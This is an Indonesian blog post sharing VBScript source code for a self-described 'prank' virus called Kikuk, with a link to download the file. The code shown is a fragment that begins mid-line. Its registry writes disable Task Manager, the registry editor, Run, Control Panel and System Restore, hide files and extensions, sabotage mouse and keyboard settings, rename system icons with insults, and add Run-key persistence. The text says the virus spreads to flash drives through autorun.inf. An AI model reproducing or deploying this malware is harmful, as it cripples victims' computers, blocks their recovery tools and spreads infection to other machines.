Virus Kikuk yang dibuat dengan VBS

virus ni bukan jahat, tapi usil yaitu mengganti tulisan mycomputer, recyle bin, my network dan lain-lain. virus ini juga akan menginfeksi file ke FD. juga secara otomatis autorun dengan membuat file autorun.inf
Berikut adalah source codenya (karena dibuat pakai vbs amaka bisa langsung di lihat source codenya....

Explorer\Main\Window Title","Your Computer Has been Infected By Virus : Paray Rontox"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\International\s1159","Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\International\s2359","Kikuk_Kikuk_666"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon Size","128"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\MinWidth","-100"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "2"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickHeight", "6000"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "6000"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickWidth", "6000"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardDelay", "0"
ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardSpeed", "36"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Paray@Hacker", rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ParayRontox", rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "2", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "0", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "0", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Text", "bangsat kljsdouiyhifeledfdsl"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Type", "sfgdhtgtygvhgf"
ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\IntroText","Maaf komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InfoTip","Maaf komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\", "Jaringan Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\", "Dokument Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tonk Kikuk_666_Kikuk"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HelloParay", rumahgue & "\Kikuk_666_Kikuk_Massage.htm"

if check <> 1 then
Wscript.sleep 300000
end if
loop while check <> 1
set sibungul = createobject("Wscript.shell")
sibungul.run rumahgue & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

apabila anda lelah memandang dan lelah untuk copy paste silahkan aja langsung donlot filenya klik disini

Virus Kikuk yang dibuat dengan VBS

Posting Komentar

SMS Gratis

Arsip Blog

Total Tayangan Halaman

Popular Posts

Categories

Daftar Blog Saya

Pengikut

Komentar Terbaru